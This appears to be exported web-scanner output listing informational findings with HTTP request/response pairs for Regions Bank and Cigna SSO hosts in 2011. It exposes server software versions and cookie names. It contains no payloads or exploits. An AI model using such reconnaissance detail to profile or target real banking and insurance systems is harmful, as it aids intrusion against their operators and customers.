| GET /oao/app02.aspx?type Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:20:42 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 76388 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/arrowOrange | 
| GET /oao/images/arrowOrange Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 60 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:15 GMT GIF89a.. .....f..........!......., | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/bgDot.gif | 
| GET /oao/images/bgDot.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 46 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:15 GMT GIF89a.............!..... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/continue.gif | 
| GET /oao/images/continue.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 407 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:23 GMT GIF89aG...............].. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/ehl_logo.gif | 
| GET /oao/images/ehl_logo.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 595 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:15 GMT GIF89a.........[[[...\\\MMM..... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/error.gif | 
| GET /oao/images/error.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 299 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:23 GMT GIF89a..........,........}y....`[ ...d8.N`.Q...%..h0.... ...O...\...........s% ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/homepage.gif | 
| GET /oao/images/homepage.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 632 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:20:42 GMT GIF89a.........U`........ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/icon_secure | 
| GET /oao/images/icon_secure Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 77 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:18 GMT GIF89a .............i....!...... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/loadingA | 
| GET /oao/images/loadingA Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 5886 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:17 GMT GIF89a........................... ...,.......... .@Ri.h..l..p,.tm..#6N.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/scripts/wtbase.js | 
| GET /oao/scripts/wtbase.js HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 17051 Content-Type: application/x-javascript Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:01 GMT function DcsInit() { this.dcsid = "dcs4b71fc10000gs8u8 this.domain = "statse.webtrendslive.com this.enabled = true; this.exre = (function() { if (window.Reg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/styles/main.css | 
| GET /oao/styles/main.css HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 10689 Content-Type: text/css Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:18:57 GMT img{border:none; padding:0px; margin:0px;} body {background: #fff; font-family: Arial; color: #444; font-size: 1em; margin:0; padding: 0;} A:link {color: #580; text-decoration: none;} A:activ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/styles/thickbox.css | 
| GET /oao/styles/thickbox.css HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 4016 Content-Type: text/css Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:18:55 GMT /* ------------------------- /* ---------->>> global settings needed for thickbox <<<---------------------- ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /SystemUnavailable.aspx | 
| GET /SystemUnavailable.aspx Host: securebank.regions.com Connection: keep-alive Referer: https://www.regions.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: securebank.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:20:16 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 4559 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Regions Online Banking</title> <link href="https://secureb ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /VAM/2_0_2/VAM.js | 
| GET /VAM/2_0_2/VAM.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT Accept-Ranges: bytes ETag: "08a854a4d9c61:f627" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT Content-Length: 37697 // Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com // Professional Validation And More v2.0.2 Level 2 var gVAM_UA = navigator.userAgent var gVAM_OS, gV ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /VAM/2_0_2/VAML2.js | 
| GET /VAM/2_0_2/VAML2.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT Accept-Ranges: bytes ETag: "08a854a4d9c61:f627" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT Content-Length: 5007 // Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com // Professional Validation And More v2.0.2 Level 2 function VAM_EvalDiffCond(pCO) { var vVal1 = pCO.ConvVal(pCO, p ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /VAM/2_0_2/VAM_DTTB.js | 
| GET /VAM/2_0_2/VAM_DTTB.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT Accept-Ranges: bytes ETag: "08a854a4d9c61:f627" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT Content-Length: 5948 // Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com // Professional Validation And More v2.0.2 Level 2 function VAM_ReformatInit(pAO) { var vFld = VAM_GetById(pAO.Con ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: no-cache Content-Length: 3262 Content-Type: image/x-icon Last-Modified: Fri, 28 Sep 2007 03:41:18 GMT Accept-Ranges: bytes ETag: "e0921d6e811c81:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:20:22 GMT ...... ..............(... ...@..................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/btnContinue.gif | 
| GET /images/btnContinue.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 1026 Content-Type: image/gif Last-Modified: Mon, 19 Feb 2007 12:52:50 GMT Accept-Ranges: bytes ETag: "03d9adc2454c71:f627" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:09 GMT GIF89aF......U..U.....V.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/equalhousing.gif | 
| GET /images/equalhousing.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 282 Content-Type: image/gif Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT Accept-Ranges: bytes ETag: "0b7b64b4d9c61:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT GIF89a...........//...... ...s.%. .#.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/green/rf_logo.gif | 
| GET /images/green/rf_logo.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 4105 Content-Type: image/gif Last-Modified: Wed, 13 Aug 2008 19:18:20 GMT Accept-Ranges: bytes ETag: "0e6a25879fdc81:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:05 GMT GIF89a).8.......U........ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/red_arrow.gif | 
| GET /images/red_arrow.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 54 Content-Type: image/gif Last-Modified: Wed, 14 Feb 2007 14:50:26 GMT Accept-Ranges: bytes ETag: "0a53d764750c71:f627" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:09 GMT GIF89a........U....!..... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/spacer.gif | 
| GET /images/spacer.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 799 Content-Type: image/gif Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT Accept-Ranges: bytes ETag: "0b7b64b4d9c61:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT GIF89a................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /script/regions.js | 
| GET /script/regions.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Wed, 20 Oct 2010 15:22:00 GMT Accept-Ranges: bytes ETag: "01c578a6a70cb1:e57b" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:00 GMT Content-Length: 8556 /************************ * * * Copyright .2005 Corillian Corporation * * ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /styles/styles.AmSouth | 
| GET /styles/styles.AmSouth Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: text/css Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT Accept-Ranges: bytes ETag: "05c773bea85ca1:e57b" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:00 GMT Content-Length: 25437 BODY {font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;} .pageBackground {background-image:url(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /styles/stylesprint.css | 
| GET /styles/stylesprint.css HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: text/css Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT Accept-Ranges: bytes ETag: "05c773bea85ca1:e57b" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:01 GMT Content-Length: 32493 BODY {font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;} .pageBackground {background-image:url(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | / | 
| GET / HTTP/1.1 Host: sso.corp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:19 GMT Content-length: 261 Content-type: text/html Set-Cookie: TLTHID=8C93EE5E7FD11 Set-Cookie: TLTSID=73F9C9687FD11 Etag: "f2e32241-1-0-105" Last-modified: Sun, 17 Jul 2005 20:01:07 GMT Accept-ranges: bytes <HTML> <HEAD> <META Http-Equiv="Cache-Control <META Http-Equiv="Pragma" Content="no-cache"> <META Http-Equiv="Expires" Content="0"> <META HTTP-EQUIV="Refresh" Content="0 ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images | 
| GET /corp/sso/images Host: sso.corp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:39 GMT Content-length: 4668 Content-type: image/gif Set-Cookie: TLTHID=989F512A7FD11 Etag: "62a2347d-1-0-123c" Last-modified: Mon, 19 Jan 2004 19:08:58 GMT Accept-ranges: bytes GIF89a..:.......D........ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/arrow | 
| GET /corp/sso/images/arrow Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:24 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "ef1cee75-1-0-3d" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA16587FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/cigna | 
| GET /corp/sso/images/cigna Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:26 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "38eba70c-1-0-9ae" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
